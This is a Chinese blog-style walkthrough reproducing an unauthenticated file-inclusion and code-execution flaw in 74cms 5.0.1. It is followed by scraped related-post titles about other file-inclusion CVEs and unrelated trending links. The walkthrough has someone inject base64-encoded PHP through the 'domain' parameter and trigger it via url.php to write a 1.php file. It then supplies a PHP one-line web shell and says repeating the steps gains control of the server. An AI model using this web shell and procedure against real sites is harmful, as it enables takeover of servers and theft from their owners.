74cms 5.0.1版本文件包含漏洞复现
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。
下载地址:
http://www.74cms.com/download/index.html
下载后解压到phpstudy的根目录www里面
输入网址,http://127.0.0.1/upload/install.php
一直点击下一步,输入数据库名称和密码
进入系统
抓个包看看
将包中的domain后面的改成如下
base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode
然后我们点击send进行发包,看到返回后status等于1,说明状态码正常,发包成功
接下来激活这个发包内容,payload:
127.0.0.1/upload/Application/Common/Conf/url.php
打开看看
发现1.php雀食被写进去了
接下来就是访问1.php了,payload;
127.0.0.1/upload/Application/Common/Conf/1.php
可以看到成功访问phpinfo,说明漏洞存在且被利用wo
我们这次用的是phpinfo,危害不大,如果我们使用一句话木马,就可以造成更大的危害
一句话木马:<?php @eval($_POST['zrtonnn']);?>
将木马用decode改成base64,重复上述操作,即可得到权限
74cms 5.0.1版本文件包含漏洞复现相关推荐
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- phpmyadminV4.8.1本地文件包含漏洞复现
文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...
- CVE-2020-1938 Aapache Tomcat AJP文件包含漏洞复现
目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用nmap扫描目标 2.运行POC验证漏洞 3.POC代码 三.修复方法 一.环境搭建 1.下载vulhub kali系统输 ...
- php文件包含漏洞复现,文件包含漏洞(绕过姿势)
当你的才华 还撑不起的野心时 那你就应该静下心来学习 目录 文件包含漏洞介绍 特殊姿势 亲测有效 php文件包含漏洞 本地包含漏洞(LFI) 远程包含漏洞 文件包含利用 读取敏感信息 远程包含shel ...
- tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现(CVE20201938)
漏洞背景 Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer ...
- phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现
漏洞描述 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试. 攻击者必须经过身份验证 ...
- 【CVE-2018-12613】phpmyadmin 4.8.1 远程文件包含漏洞复现
**环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: tar ...
- test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...
- 远程文件包含 php,php本地及远程文件包含漏洞
在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen on allow_url_include on 但是开启这两个功能之后伴随的是url ...
- index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...
最新文章
- PyTorch代码调试利器: 自动print每行代码的Tensor信息
- mysql配置_Mysql配置 max_allowed_packet
- 什么是强人工智能,强人工智能的实现,需要具备哪些条件?
- 关于jenkins的安装及自动部署
- Css的filter常用濾波器屬性及語句大全
- 第三次小组赛解题报告
- Fibonacci Knapsack
- 工业级光纤收发器的选用方法
- PHP uniqid()函数可用于生成不重复的唯一标识符,该函数基于微秒级当前时间戳。在高并发或者间隔时长极短(如循环代码)的情况下,会出现大量重复数据。即使使用了第二个参数,也会重复,最好的方案是结
- css border 圆角气泡案例
- C程序设计案例(矩形法求定积分问题)
- select下拉复选
- 入手新吉他了--雅马哈F600
- DeDeCMS二次开发教程之程序安装
- 惊讶!一行Python代码让图形秒变「手绘风」
- 《投资中最简单的事》”第二部分--投资办法“读书笔记
- google迈向IoT的开端——推出Android Things操作系统
- 2021.02.17 GDKOI2021 好题记 第一记
- Java 引用变量和实体变量
- 卓海科技冲刺创业板:拟募资5.47亿 相宇阳控制52.9%股权
热门文章
- 正二十面体制作步骤介绍
- 什么是冒烟测试?什么是回归测试?
- 腾讯WiFi管家 v3.7.3
- 天正电气lisp是什么文件_教大家如何使用天正电气软件绘制图纸
- PHP爬虫常用技术:v8js(执行js代码)
- 《HybridSN: Exploring 3-D–2-DCNN Feature Hierarchy for Hyperspectral Image Classification》论文学习笔记
- C/C++实现atoll函数
- 教你查看网页的记住密码和免费下载付费音乐
- 2022泰迪杯B题思路解析(LSTM神经网络,时间序列ARIMA模型)可供学习参考
- 色彩设计原理(里面有配色方案,也有配色网站)